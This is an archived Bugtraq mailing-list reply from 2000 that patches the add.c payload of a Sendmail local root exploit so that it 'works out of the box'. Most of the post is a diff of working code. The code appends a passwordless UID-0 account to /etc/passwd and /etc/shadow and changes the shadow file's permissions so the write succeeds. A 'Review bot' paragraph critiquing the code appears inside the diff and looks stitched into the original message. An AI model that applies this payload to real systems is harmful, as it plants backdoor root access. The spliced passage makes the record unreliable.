[15294] in bugtraq
Re: Sendmail local root exploit on linux 2.2.x
daemon@ATHENA.MIT.EDU (Mark K. Pettit)
Sat Jun 10 04:23:06 2000
Message-Id: <200006081918.MAA10306@grand.yahoo.com>
Date: Thu, 8 Jun 2000 12:18:44 -0700
Reply-To: "Mark K. Pettit" <pettit@YAHOO-INC.COM>
From: "Mark K. Pettit" <pettit@YAHOO-INC.COM>
X-To: sky@REAL-LINUX.DE
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <393F8FDC.882BAEE5@real-linux.de> (message from Florian Heinz on
Thu, 8 Jun 2000 14:21:48 +0200)
>Hello all,
>
>Attached is a file with 2 sources, ex.c and add.c

This is a great exploit. It is a little broken, though. Here's a
patched version of the add.c script so that it is a little kinder and
works out of the box the first time.

The problem has to do with the permissions on the shadow file. If it's
installed with mode 400, the exploit will fail. There's also a \n left
out of the shadow line.

This patch fixes both of these problems. Yah, I know it's trivial, but
I wanted to be complete.

============================================================================
--- add.c.orig Thu Jun 8 11:32:33 2000
+++ add.c Thu Jun 8 11:21:15 2000
@@ -1,17 +1,24 @@
#include <fcntl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <unistd.h>
int main (void) {
int fd;
char string[40];
+ struct stat buf;
seteuid(0);
fd = open("/etc/passwd", O_APPEND|O_WRONLY);
strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
write(fd, string, strlen(string));
close(fd);
+ stat("/etc/shadow", &buf);
+ chmod("/etc/shadow", S_IRUSR|S_IWUSR);
fd = open("/etc/shadow", O_APPEND|O_WRONLY);
- strcpy(string, "yomama::11029:0:99999:7:::");
+ strcpy(string, "yomama::11029:0:99999:7:::\n");
write(fd, string, strlen(string));
close(fd);
-
+ chmod("/etc/shadow", buf.st_mode);
}
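
Review bot: the return value of stat("/etc/shadow", &buf) is not checked, so when it fails the closing chmod("/etc/shadow", buf.st_mode) applies an uninitialized mode to the shadow file and can leave it with arbitrary permissions. Test the stat() result and skip the restore when the original mode was never read; the chmod() and open() results in the same block are unchecked as well. Separately, the file calls strcpy() and strlen() but the include list, even with the three added headers, has no <string.h>.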
============================================================================
--
Mark K. Pettit, CCNA Do you, uh, Yahoo!?
pettit@yahoo-inc.com Why, yes, I do, uh, Yahoo!
Technical Yahoo
Yahoo!, Inc., 3420 Central Expressway, Santa Clara, CA 95051